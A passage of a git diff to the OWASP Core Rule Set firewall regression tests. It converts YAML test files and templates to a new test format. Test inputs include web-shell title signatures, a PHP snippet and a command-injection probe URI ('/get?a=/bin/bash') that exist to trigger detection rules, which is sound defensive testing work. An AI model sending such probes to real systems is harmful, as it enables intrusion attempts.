955100-1 + - test_id: 1 desc: "Matching web shell NCC Shell" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.1" - uri: "/reflect" - data: |- - {"body": "

.:NCC:. Shell v"} - output: - log_contains: "id \"955100\"" - - test_title: 955100-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.1" + uri: "/reflect" + data: |- + {"body": "

.:NCC:. Shell v"} + output: + log: + expect_ids: [955100] + - test_id: 2 desc: "Matching web shell Simple PHP backdoor" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.1" - uri: "/reflect" - data: |- - {"body": ""} - output: - log_contains: "id \"955100\"" - - test_title: 955100-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.1" + uri: "/reflect" + data: |- + {"body": ""} + output: + log: + expect_ids: [955100] + - test_id: 3 desc: "Matching web shell WinX Shell" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.1" - uri: "/reflect" - data: |- - {"body": "-:[GreenwooD]:- WinX Shell"} - output: - log_contains: "id \"955100\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.1" + uri: "/reflect" + data: |- + {"body": "-:[GreenwooD]:- WinX Shell"} + output: + log: + expect_ids: [955100] diff --git a/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955260.yaml b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955260.yaml index 68483c2cf..4098fec7a 100644 --- a/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955260.yaml +++ b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955260.yaml @@ -1,27 +1,25 @@ --- meta: author: "azurit" - enabled: true - name: "955260.yaml" - description: "Regression tests for rule 955260" +rule_id: 955260 tests: - - test_title: 955260-1 + - test_id: 1 desc: "Matching web shell Ru24PostWebShell. Our test infrastructure, currently, cannot run this test properly because of multiline output, so it's disabled." stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.1" - uri: "/reflect" - data: "{\"body\": \"\\n\\nRu24PostWebShell -\"}" - output: - log_contains: "id \"955260\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.1" + uri: "/reflect" + data: "{\"body\": \"<html>\\n<head>\\n<title>Ru24PostWebShell -\"}" + output: + log: + expect_ids: [955260] diff --git a/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml b/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml index 46a3b5433..1f1dbe8ab 100644 --- a/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml +++ b/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml @@ -1,72 +1,71 @@ --- meta: author: "studersi, azurit" - enabled: true - name: "959100.yaml" description: | Test whether the outbound blocking mechanism works by testing whether rule 959100 is triggered. For these tests, existing test are repurposed with different assertions. Instead of asserting that the original rules are triggered that the tests are written for, we assert that triggering these rules causes the blocking rule to be triggered. +rule_id: 959100 tests: - - test_title: 959100-1 + - test_id: 1 desc: Test is basically identical to 953120-1 (PHP leakage positive test in phase 4) but here we assert that the outbound blocking mechanism is triggered stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: "{\"body\": \"<?php echo \\\"Hello World!\\n\\\" ?>\"}" - output: - log_contains: "id \"959100\"" - - test_title: 959100-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: "{\"body\": \"<?php echo \\\"Hello World!\\n\\\" ?>\"}" + output: + log: + expect_ids: [959100] + - test_id: 2 desc: Test is basically identical to 953120-1 (PHP leakage negative test in phase 4) but here we assert that the outbound blocking mechanism is not triggered stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "<?php12345"} - output: - no_log_contains: "id \"959100\"" - - test_title: 959100-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "<?php12345"} + output: + log: + no_expect_ids: [959100] + - test_id: 3 desc: Test is basically identical to 959100-1 (see above) but here we assert that the scores are summed up and reported properly stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: "{\"body\": \"<?php echo \\\"Hello World!\\n\\\" ?>\"}" - output: - log_contains: "Outbound Anomaly Score Exceeded [(]Total Score: " + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: "{\"body\": \"<?php echo \\\"Hello World!\\n\\\" ?>\"}" + output: + log: + match_regex: 'Outbound Anomaly Score Exceeded \(Total Score: ' diff --git a/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml b/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml index df07008b4..027c14df7 100644 --- a/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml +++ b/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml @@ -1,78 +1,77 @@ --- meta: author: "studersi, azurit" - enabled: true - name: "980170.yaml" description: | Test whether level 4 inbound reporting in phase 5 works by testing whether rule 980170 is triggered. For these tests, existing test are repurposed with different assertions. Instead of asserting that the original rules are triggered that the tests are written for, we assert that triggering these rules causes the corresponding reporting rules to be triggered. +rule_id: 980170 tests: - - test_title: 980170-1 + - test_id: 1 desc: Test is similar to 920350-1 but here we check if at reporting level 4 a request is logged that was blocked stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "127.0.0.1" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - # Will match rules - # - 920273: restricted characters violation - # - 920350: numeric IP in Host header - # - 932160: Unix remote command execution - # - 932236: Unix command injection - # - 932260: Unix remote command execution - uri: "/get?a=/bin/bash" - version: "HTTP/1.1" - output: - # Phase 5 rules are prone to a race condition when parsing log output. - # Retry the test once if it fails to work around this issue. - # See https://github.com/coreruleset/go-ftw/issues/141. - retry_once: true - log_contains: "id \"980170\"" - - test_title: 980170-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "127.0.0.1" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + # Will match rules + # - 920273: restricted characters violation + # - 920350: numeric IP in Host header + # - 932160: Unix remote command execution + # - 932236: Unix command injection + # - 932260: Unix remote command execution + uri: "/get?a=/bin/bash" + version: "HTTP/1.1" + output: + # Phase 5 rules are prone to a race condition when parsing log output. + # Retry the test once if it fails to work around this issue. + # See https://github.com/coreruleset/go-ftw/issues/141. + retry_once: true + log: + expect_ids: [980170] + - test_id: 2 desc: Test is similar to 920350-1 but here we check if at reporting level 4 a request is logged that scored but was not blocked stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - # Will match rule 920350: numeric IP in Host header - Host: "127.0.0.1" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - # Phase 5 rules are prone to a race condition when parsing log output. - # Retry the test once if it fails to work around this issue. - # See https://github.com/coreruleset/go-ftw/issues/141. - retry_once: true - log_contains: "id \"980170\"" - - test_title: 980170-3 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + # Will match rule 920350: numeric IP in Host header + Host: "127.0.0.1" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + # Phase 5 rules are prone to a race condition when parsing log output. + # Retry the test once if it fails to work around this issue. + # See https://github.com/coreruleset/go-ftw/issues/141. + retry_once: true + log: + expect_ids: [980170] + - test_id: 3 desc: Test is similar to 920350-1 but here we check if at reporting level 4 a request is not logged that did not score stages: - - stage: - input: - dest_addr: "localhost" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - # Phase 5 rules are prone to a race condition when parsing log output. - # Retry the test once if it fails to work around this issue. - # See https://github.com/coreruleset/go-ftw/issues/141. - retry_once: true - no_log_contains: "id \"980170\"" + - input: + dest_addr: "localhost" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + # Phase 5 rules are prone to a race condition when parsing log output. + # Retry the test once if it fails to work around this issue. + # See https://github.com/coreruleset/go-ftw/issues/141. + retry_once: true + log: + no_expect_ids: [980170] diff --git a/tests/regression/tests/base_positive_rules.py b/tests/regression/tests/base_positive_rules.py index 2617ad7a7..a9fafe931 100755 --- a/tests/regression/tests/base_positive_rules.py +++ b/tests/regression/tests/base_positive_rules.py @@ -18,8 +18,6 @@ Meta='''--- meta: author: "spartantri" - enabled: true - name: "skeletonid.yaml" description: "Positive tests for rule skeletonid" tests: ''' diff --git a/tests/regression/tests/positivetest-light.yaml.skeleton b/tests/regression/tests/positivetest-light.yaml.skeleton index 65ca49569..ab0842f9f 100644 --- a/tests/regression/tests/positivetest-light.yaml.skeleton +++ b/tests/regression/tests/positivetest-light.yaml.skeleton @@ -1,255 +1,236 @@ - - - test_title: skeletonid-skeletontest + - test_id: 1 desc: "Argument test includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=skeletonkeyword" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=skeletonkeyword" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 2 desc: "Argument name includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "skeletondefaultcontenttype" - method: "POST" - version: "HTTP/1.0" - data: "skeletonkeyword=test" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + method: "POST" + uri: / + version: "HTTP/1.0" + data: "skeletonkeyword=test" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 3 desc: "Cookie test includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "skeletondefaultcontenttype" - Cookie: test=skeletonkeyword - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + Cookie: test=skeletonkeyword + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 4 desc: "Cookie name includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "skeletondefaultcontenttype" - Cookie: skeletonkeyword=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + Cookie: skeletonkeyword=test + method: "POST" + uri: / + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 5 desc: "Request header test includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "skeletondefaultcontenttype" - test: skeletonkeyword - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + test: skeletonkeyword + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 6 desc: "XML attribute value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"skeletonkeyword\">element_value</element></xml>" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + uri: / + version: "HTTP/1.0" + data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"skeletonkeyword\">element_value</element></xml>" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 7 desc: "XML element value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">skeletonkeyword</element></xml>" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">skeletonkeyword</element></xml>" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 8 desc: "Nested XML element value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">skeletonkeyword</element></l3></l2></l1></xml>" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">skeletonkeyword</element></l3></l2></l1></xml>" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 9 desc: "Content-Type text/plain includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=skeletonkeyword" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=skeletonkeyword" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 10 desc: "Content-Type application/json arg value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"skeletonkeyword\"}" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"skeletonkeyword\"}" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 11 desc: "Content-Type application/json arg name includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"skeletonkeyword\": \"test\"}" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"skeletonkeyword\": \"test\"}" + output: + log: + expect_ids: [skeletonid] diff --git a/tests/regression/tests/positivetest.yaml.skeleton b/tests/regression/tests/positivetest.yaml.skeleton index 83f0b2dee..4391b960c 100644 --- a/tests/regression/tests/positivetest.yaml.skeleton +++ b/tests/regression/tests/positivetest.yaml.skeleton @@ -1,393 +1,359 @@ - - - test_title: skeletonid-skeletontest + - test_id: 1 desc: "Argument test includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=skeletonkeyword" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=skeletonkeyword" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 2 desc: "Argument name includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "skeletondefaultcontenttype" - method: "POST" - version: "HTTP/1.0" - data: "skeletonkeyword=test" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + method: "POST" + version: "HTTP/1.0" + data: "skeletonkeyword=test" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 3 desc: "Cookie test includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "skeletondefaultcontenttype" - Cookie: test=skeletonkeyword - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + Cookie: test=skeletonkeyword 